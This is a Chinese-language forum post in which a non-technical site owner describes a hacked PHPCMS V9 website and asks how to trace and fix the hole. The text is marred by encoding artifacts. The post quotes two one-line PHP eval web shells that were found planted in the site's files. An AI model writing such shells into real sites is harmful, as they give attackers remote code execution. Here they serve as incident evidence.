網(wǎng)站近來(lái)頻繁遭遇黑客攻擊,請(qǐng)求PHP大神給予協(xié)助�,厘清思路,以助早日找到漏洞���,解決煩憂�!
現(xiàn)將事件經(jīng)過(guò)陳述如下:
1�����、網(wǎng)站采用PHPCMS_V9_5.20默認(rèn)版本搭建��。
2�、所有文件起先均以全開放權(quán)限存于服務(wù)器根目錄。
3��、后來(lái)網(wǎng)站被黑�����,入口文件api.php和index.php被改寫��。
4�、植入病毒文件為:“一句話木馬”。內(nèi)容如下:
<?php @eval($_POST['dcs-19']);?>
<?php
5�����、發(fā)現(xiàn)問(wèn)題����,刪除以后,將此類文件的權(quán)限鎖死�����,以為就能解決問(wèn)題���?���?墒歉魩兹眨l(fā)現(xiàn)網(wǎng)站的快照被劫持��,遂又查殺了一次木馬�����,結(jié)果顯示����,木馬文件所在位置為服務(wù)器根目錄下uploadfile20170527文件夾中,此文件為后臺(tái)上傳附件或更新文章時(shí)按照日期自動(dòng)生成��。但是5月27日這天并沒(méi)有更新文章���,卻出現(xiàn)了�����,請(qǐng)求大神給予協(xié)助���,排查網(wǎng)站問(wèn)題根源所在。
木馬內(nèi)容為:
<?php eval($_POST[1]);?>
ok
另附:在網(wǎng)上查詢了相關(guān)內(nèi)容,大多數(shù)說(shuō)是網(wǎng)站程序漏洞所致的sql注入攻擊�,提示修復(fù)漏洞,但是怎么修復(fù)?�?�?PHP版本在線升級(jí)會(huì)有用嗎�?
【本人小白非技術(shù)出生�,很多東西都不懂,說(shuō)的不明白的地方��,問(wèn)答中�����,我再按照你們的指示補(bǔ)充�!】
